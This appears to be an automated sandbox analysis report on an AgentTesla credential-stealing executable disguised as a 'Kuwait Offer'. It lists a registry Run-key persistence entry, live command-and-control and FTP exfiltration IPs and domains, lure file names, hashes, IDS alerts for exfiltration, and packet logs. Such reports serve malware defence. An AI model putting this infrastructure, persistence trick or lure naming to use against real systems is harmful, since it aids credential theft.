                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 469
                    • Number of non-executed functions: 36
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target InstallUtil.exe, PID 7848 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    07:56:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hxfzsthbd C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                    07:56:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hxfzsthbd C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    67.212.175.162BITUMEN_60-70_-_JUMBO_Specification.exeGet hashmaliciousFormBook, NSISDropperBrowse
                    • www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp
                    EL-515-_HEAT_TRACING.exeGet hashmaliciousFormBook, NSISDropperBrowse
                    • www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN
                    5.2.84.236PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                      PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                        inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                          PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                            Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                              PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                  Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                      Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        wymascensores.comRFQ-350548 P1-00051538.pdf.exeGet hashmaliciousUnknownBrowse
                                        • 67.212.175.162
                                        RFQ-350548 P1-00051538.pdf.exeGet hashmaliciousUnknownBrowse
                                        • 67.212.175.162
                                        Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        RFQ__PO_PO 24090041-PDF____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        ftp.alternatifplastik.comPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 5.2.84.236
                                        OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        SINGLEHOP-LLCUSRFQ-350548 P1-00051538.pdf.exeGet hashmaliciousUnknownBrowse
                                        • 67.212.175.162
                                        RFQ-350548 P1-00051538.pdf.exeGet hashmaliciousUnknownBrowse
                                        • 67.212.175.162
                                        Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        sora.arm.elfGet hashmaliciousMiraiBrowse
                                        • 65.62.1.103
                                        http://www.edgeupgrade.com/Get hashmaliciousUnknownBrowse
                                        • 107.6.168.252
                                        https://hblitigation-news.com/Get hashmaliciousUnknownBrowse
                                        • 198.143.164.252
                                        https://www.oferdigitaiscom.com/Get hashmaliciousUnknownBrowse
                                        • 198.143.164.252
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        RFQ__PO_PO 24090041-PDF____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                        • 67.212.175.162
                                        ALASTYRTRPO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                        • 5.2.84.221
                                        BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                        • 5.2.84.221
                                        Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 5.2.84.236
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eUrgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 67.212.175.162
                                        SPARES REQUISITION.XLSX.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 67.212.175.162
                                        CMB FLORIS DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 67.212.175.162
                                        SUN ACE TBN VESSEL DETAILS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 67.212.175.162
                                        rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • 67.212.175.162
                                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • 67.212.175.162
                                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • 67.212.175.162
                                        hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • 67.212.175.162
                                        2ngxhElaud.exeGet hashmaliciousXmrigBrowse
                                        • 67.212.175.162
                                        https://Vv.ndlevesio.com/vrbU/Get hashmaliciousUnknownBrowse
                                        • 67.212.175.162
                                        No context
                                        Process:C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):975872
                                        Entropy (8bit):5.369427897467404
                                        Encrypted:false
                                        SSDEEP:6144:y3RGg96TatCqrplgjl2xrkGBiTqmqFOrX1SQLYhyb/H3SY34J/JssbACSWTYXPS8:CRGgZLr0JQiTqmqgX1fGDQeTsAiL
                                        MD5:B77B84072A85329568EA006B1B7F4201
                                        SHA1:D9B623C149EEABF151684D852B7D0AB431712C42
                                        SHA-256:46044E8E01547F2456E27E8B15C667F004A2C26FD647F3CECC71DE19015D96C0
                                        SHA-512:F4C27771129CAB42B97799103F22EB75BCC000394A7710D7BE0C0FF62CA08BEBCEECCD01D07187D2B18A8E5934B3650AEFC3F808697AEC3625C66ACF59ACFB2C
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 34%
                                        • Antivirus: Virustotal, Detection: 28%, Browse
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..g................................. ........@.. .......................@............`.................................8...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................p.......H........y..X..................................................................?.......?.......?.......?.......................?................jx:.....m.e>A..?...t:..?.......?..p.I..?..R<}.d?.......?.....\.?f.3p...?..R..&.?..U..Q.?....J.c?oq$..`.?Q...cy.........?.AR.'.?.F.<.B.?@..sP..?.X..! .?..#.a.?..oC.'Q?.#...F..M....R... ...:?..nTV.1?...8.e.?.1q.w..>El!>W.t>..QP._..\.7...?[.P.7{.?<...N.?...{/Y.?.q?.@.r?..D..(4?#.6...k?].7..&H.o.vW.....^.0.?3..KM.....?lh.|?..zxhGt.
                                        Process:C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.369427897467404
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:Kuwait Offer48783929281-BZ2.exe
                                        File size:975'872 bytes
                                        MD5:b77b84072a85329568ea006b1b7f4201
                                        SHA1:d9b623c149eeabf151684d852b7d0ab431712c42
                                        SHA256:46044e8e01547f2456e27e8b15c667f004a2c26fd647f3cecc71de19015d96c0
                                        SHA512:f4c27771129cab42b97799103f22eb75bcc000394a7710d7be0c0ff62ca08bebceeccd01d07187d2b18a8e5934b3650aefc3f808697aec3625c66acf59acfb2c
                                        SSDEEP:6144:y3RGg96TatCqrplgjl2xrkGBiTqmqFOrX1SQLYhyb/H3SY34J/JssbACSWTYXPS8:CRGgZLr0JQiTqmqgX1fGDQeTsAiL
                                        TLSH:9F25A41077EA5956FAFF6BF19DB816554F36BC66BA38CA1E0240028E4A71F188D10F37
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..g................................. ........@.. .......................@............`................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x4ef98e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6704AA67 [Tue Oct 8 03:43:35 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xef9380x53.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x5b6.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf20000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xed9940xeda00d7220b2a1d9a0c4dbc5292265bf75c65False0.27656496580746975data5.3733603080067205IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xf00000x5b60x60011353f2fe342ec5d63980224dacbb778False0.41796875data4.111738367823075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xf20000xc0x2004b7ff1fbe52a1b9f76abb86544061071False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0xf00a00x32cdata0.4248768472906404
                                        RT_MANIFEST0xf03cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-08T08:56:03.760641+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.9497425.2.84.23621TCP
                                        2024-10-08T08:56:04.458622+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.9497585.2.84.23655304TCP
                                        2024-10-08T08:56:04.463815+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.9497585.2.84.23655304TCP
                                        2024-10-08T08:56:16.368764+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.9498215.2.84.23621TCP
                                        2024-10-08T08:56:17.062169+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.9498405.2.84.23651505TCP
                                        2024-10-08T08:56:17.067407+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.9498405.2.84.23651505TCP
                                        2024-10-08T08:56:25.599272+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.9498835.2.84.23621TCP
                                        2024-10-08T08:56:26.305049+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.9498975.2.84.23662301TCP
                                        2024-10-08T08:56:26.310354+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.9498975.2.84.23662301TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 8, 2024 08:55:57.690655947 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:57.690686941 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:57.690776110 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:57.709250927 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:57.709269047 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.242372036 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.242774963 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.245780945 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.245789051 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.246121883 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.291419029 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.294030905 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.339401960 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.419153929 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.419230938 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.419255018 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.419291019 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.419306040 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.419328928 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.442972898 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.443058968 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.443068981 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.494090080 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.509212971 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.509251118 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.509268999 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.509329081 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.509329081 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.511630058 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.511658907 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.511691093 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.511703968 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.511730909 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.511764050 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.511866093 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.511889935 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.511933088 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.511962891 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.533334970 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.533355951 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.533427000 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.533467054 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.599838018 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.600172043 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.600303888 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.600382090 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.601150036 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.601259947 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.602114916 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.602211952 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.602310896 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.602332115 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.603094101 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.603415012 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.603424072 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.603611946 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.604101896 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.604176998 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.623931885 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.624008894 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.690677881 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.690845013 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.690854073 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.690879107 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.690915108 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.690936089 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.691255093 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.691325903 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.691530943 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.691659927 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.691979885 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.692045927 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.692168951 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.692253113 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.692894936 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.692981005 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.692981958 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.693006039 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.693041086 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.693078995 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.695365906 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.695473909 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.695579052 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.695655107 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.696147919 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.696271896 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.699081898 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.699184895 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.714641094 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.714725018 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.714838982 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.714864016 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.714920998 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.715003014 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.715015888 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.715080023 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.781014919 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.781084061 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.781117916 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.781157970 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.781188965 CEST4434971767.212.175.162192.168.2.9
